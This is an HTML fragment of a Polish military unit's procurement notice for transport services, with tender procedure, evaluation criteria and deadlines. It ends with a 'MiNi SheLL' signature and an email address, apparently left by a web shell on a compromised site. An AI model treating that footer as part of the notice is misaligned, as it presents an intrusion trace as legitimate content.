<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	złożą oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 6, w którym           należy przedstawić  jakimi środkami transportu dysponuje Wykonawca przystępując do realizacji  przedmiotu zamówienia oraz oświadczyć, iż usługi będą wykonywanie na                sprawnych technicznie środkach transportu posiadających ubezpieczenie                           OC i NNW oraz aktualne  badania   techniczne pojazdów.
2)	 złożą oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 4  informujące czy Wykonawca będzie korzystać z pomocy innych firm (podwykonawców)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 5701; 69-211 Wędrzyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2013 godzina 08:45, miejsce: Jednostka Wojskowa 5701; 69-211 Wędrzyn- bud. nr 33; pok.211- Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com